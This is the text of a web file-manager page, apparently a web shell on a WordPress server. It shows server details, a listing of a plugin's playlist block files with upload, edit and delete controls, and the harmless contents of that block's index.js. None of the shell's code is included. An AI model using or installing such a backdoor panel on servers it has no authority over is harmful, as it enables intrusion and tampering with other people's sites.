[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
presto-player
/
src
/
admin
/
blocks
/
blocks
/
playlist
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 attributes.js
452 B
SET
[ EDIT ]
|
[ DEL ]
📄 block.json
1,579 B
SET
[ EDIT ]
|
[ DEL ]
📄 edit.js
8,247 B
SET
[ EDIT ]
|
[ DEL ]
📄 index.js
621 B
SET
[ EDIT ]
|
[ DEL ]
📄 save.js
257 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: index.js
/** * WordPress dependencies */ import { __ } from "@wordpress/i18n"; /** * Internal dependencies */ import edit from "./edit"; import save from "./save"; import metadata from "./block.json"; const { name } = metadata; export { metadata, name }; export const options = { icon: ( <svg width="19" height="15" className="playlist-block-icon" viewBox="0 0 19 15" fill="none" xmlns="http://www.w3.org/2000/svg" > <path d="M0 4H11V6H0V4ZM0 0H11V2H0V0ZM0 8H7V10H0V8ZM13 7V15L19 11L13 7Z" fill="currentColor" /> </svg> ), edit, save, };